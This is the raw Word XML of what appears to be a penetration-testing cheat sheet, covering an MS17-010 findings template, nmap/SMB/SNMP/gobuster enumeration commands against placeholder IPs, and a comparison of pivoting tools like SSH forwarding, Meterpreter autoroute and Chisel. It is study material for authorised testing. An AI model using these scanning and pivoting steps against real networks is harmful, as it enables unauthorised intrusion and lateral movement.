      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> 445 SMB (Win2008), 80 HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7BBD49" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">Findings </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">  :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> MS17-010 vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281991C8" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">Access   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">  :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> SYSTEM via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> over the pivot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FA6D96" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">Creds    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">  :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>admin:Passw</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">0rd!  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>/  NTLM</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> aad3b...:31d6c...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4AFBB7" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">Pivot    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">  :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> dual-homed -&gt; next tier 172.16.30.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A78ECC" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">Evidence </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">  :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> screenshots/172.16.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>20.20-*.png</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="571DF07D" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Golden rules:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> (1) you can't re-pop a box after the clock stops — evidence </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>as you go</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">; (2) keep a </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>live network map</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> of "host → which segments it reaches"; (3) the moment you land on a host, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>enumerate its NICs</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> — a second interface is the door to the next range.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329FD715" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:pict w14:anchorId="6F378273">
          <v:rect id="_x0000_i1190" style="width:0;height:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="390B1B25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>3. Recon, Scanning &amp; Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1D1E19" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># host discovery -&gt; full-port -&gt; targeted (placeholder IPs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A18A61C" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>sn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> 10.10.10.0/24 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>oN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> hosts.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA951EC" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -p- --min-rate 2000 -T4 10.10.10.10 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>oN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> allports.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B884BB" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -p 80,135,139,445,3389 10.10.10.10 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>oN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> services.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C8C40A" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> --script "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">-vuln-*" -p445 10.10.10.10          </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># MS17-010 etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E157FC2" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:lastRenderedPageBreak/>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>sU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> --top-ports 50 10.10.10.10                    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># UDP (SNMP/DNS/TFTP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D3244C" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"># service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>enum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="542443F6" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>enum4linux-ng -A 10.10.10.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5011BB" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>smbmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -H </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>10.10.10.10 ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> 10.10.10.10 -u '' -p ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C4F2D9" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>snmpwalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -v2c -c public 10.10.10.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA5465A" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -u http://10.10.10.10 -w directory-list-2.3-medium.txt -x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>php,html</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>,txt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7588A42A" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Always, on every foothold, map the second network:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160EC550" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> a; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> route; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -a          </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB450D3" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">ipconfig /all; route print; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -a   </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538D826C" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">/hosts                   </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># internal name hints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D145EB" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:pict w14:anchorId="3F94602D">
          <v:rect id="_x0000_i1191" style="width:0;height:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="55743CA9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>4. Pivoting &amp; Tunneling — Overview &amp; Comparison</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6747F5A3" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">You compromise a </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dual-homed PIVOT</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> that sees an internal segment you can't; route your tooling through it.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4114"/>
        <w:gridCol w:w="3776"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F17F75" w:rsidRPr="00F17F75" w14:paraId="0EB58AFA" w14:textId="77777777"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shd w:val="clear" w:color="auto" w:fill="0F172A"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EA74AAD" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F17F75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shd w:val="clear" w:color="auto" w:fill="0F172A"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02E8AE3C" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F17F75">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>When to use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shd w:val="clear" w:color="auto" w:fill="0F172A"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3370F00A" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F17F75">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Gives you</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F17F75" w:rsidRPr="00F17F75" w14:paraId="698E3B2F" w14:textId="77777777"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65A14D0B" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
            <w:r w:rsidRPr="00F17F75">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>SSH -L/-R/-D</w:t>
            </w:r>
            <w:r w:rsidRPr="00F17F75">
              <w:t xml:space="preserve"> (§5)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78158FFC" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
            <w:r w:rsidRPr="00F17F75">
              <w:t>SSH available on/through the pivot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6E41B373" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
            <w:r w:rsidRPr="00F17F75">
              <w:t>Clean local/remote forwards + SOCKS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F17F75" w:rsidRPr="00F17F75" w14:paraId="4140CC71" w14:textId="77777777"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10817662" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F17F75">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Datapipe</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F17F75">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F17F75">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Socat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F17F75">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F17F75">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>portproxy</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F17F75">
              <w:t xml:space="preserve"> (§6)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51A74E30" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
            <w:r w:rsidRPr="00F17F75">
              <w:t>Quick single-port relay; Windows built-in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1A6F774F" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
            <w:r w:rsidRPr="00F17F75">
              <w:t>One-port TCP/UDP forward</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F17F75" w:rsidRPr="00F17F75" w14:paraId="6CA1BDF8" w14:textId="77777777"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6DEFF479" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
            <w:r w:rsidRPr="00F17F75">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Meterpreter </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F17F75">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>autoroute+SOCKS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F17F75">
              <w:t xml:space="preserve"> (§7)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2982B59A" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
            <w:r w:rsidRPr="00F17F75">
              <w:t>You have a Meterpreter session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167DA14D" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
            <w:r w:rsidRPr="00F17F75">
              <w:t>Route the whole framework + SOCKS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F17F75" w:rsidRPr="00F17F75" w14:paraId="580FBFD1" w14:textId="77777777"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1401B960" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
            <w:r w:rsidRPr="00F17F75">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Chisel</w:t>
            </w:r>
            <w:r w:rsidRPr="00F17F75">
              <w:t xml:space="preserve"> (§8)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2131491B" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
            <w:r w:rsidRPr="00F17F75">
              <w:t>No SSH; egress over HTTP(S)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7ACE513E" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
            <w:r w:rsidRPr="00F17F75">
              <w:t>Local/reverse tunnels + SOCKS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6F3E9E59" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Concept — MSF autoroute (from the notes):</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>autoroute</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> adds a route to the internal subnet </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>through</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> an existing Meterpreter session, so the whole framework reaches hosts you otherwise couldn't — "if the route is reachable, MSF can scan/exploit it." For non-MSF tools, add a </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SOCKS proxy</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> and drive everything through </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> (§10).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504DABF9" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:pict w14:anchorId="3A3A757D">
          <v:rect id="_x0000_i1192" style="width:0;height:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECB622C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>5. SSH Port Forwarding (Local, Remote, Dynamic)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B820F58" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>The three SSH tunnel modes — the cleanest pivot when SSH is available on the PIVOT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7793893E" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Local forward -L</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> — a port </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
